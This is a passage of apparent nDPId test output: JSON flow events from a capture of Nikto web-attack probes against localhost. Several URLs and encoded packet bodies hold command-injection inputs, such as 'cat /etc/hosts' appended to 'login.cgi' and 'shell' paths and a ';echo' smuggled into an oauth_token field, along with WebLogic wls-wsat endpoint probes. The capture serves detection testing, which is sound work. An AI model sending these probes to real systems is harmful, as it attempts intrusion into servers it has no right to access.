{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7440000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7440000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7440000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278010,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/OK1AAEAGAwp\/AAABfwAAAcgAH5D7EgH2VMq6xIAYAED\/MwAAAQEICp1nACKdZwAiR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlMTEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODgpDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpIb3N0OiAxMjcuMC4wLjENCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278010,"flow_last_seen":1576420278010,"flow_idle_time":7440000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51200,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007188)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00851{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":343,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":343,"pkt_l4_len":309,"thread_ts_msec":1576420278012,"pkt":"AAAAAAAAAAAAAAAACABFAAFJWQ5AAEAG4p5\/AAABfwAAAcgCH5Cjm2BUk9d3uYAYAED\/PQAAAQEICp1nACSdZwAkR0VUIC9sb2dpbi5jZ2k\/Y2xpPWFhJTIwYWElMjdjYXQlMjAvZXRjL2hvc3RzIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ29udGVudC1MZW5ndGg6IDM5DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MjM0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278012,"flow_last_seen":1576420278012,"flow_idle_time":7440000,"flow_min_l4_payload_len":277,"flow_max_l4_payload_len":277,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":277,"midstream":1,"thread_ts_msec":1576420278012,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51202,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi?cli=aa%20aa%27cat%20\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007234)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":323,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":323,"pkt_l4_len":289,"thread_ts_msec":1576420278014,"pkt":"AAAAAAAAAAAAAAAACABFAAE1Ck9AAEAGMXJ\/AAABfwAAAcgEH5AitzMTI6HHCIAYAED\/KQAAAQEICp1nACadZwAmR0VUIC9zaGVsbD9jYXQrL2V0Yy9ob3N0cyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzIzNSkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278014,"flow_last_seen":1576420278014,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51204,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat+\/etc\/hosts","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007235)"}} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277895,"flow_last_seen":1576420277895,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":746,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277896,"flow_last_seen":1576420277896,"flow_idle_time":7440000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":192,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":747,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277898,"flow_last_seen":1576420277898,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277899,"flow_last_seen":1576420277899,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277901,"flow_last_seen":1576420277901,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277902,"flow_last_seen":1576420277902,"flow_idle_time":7440000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":180,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 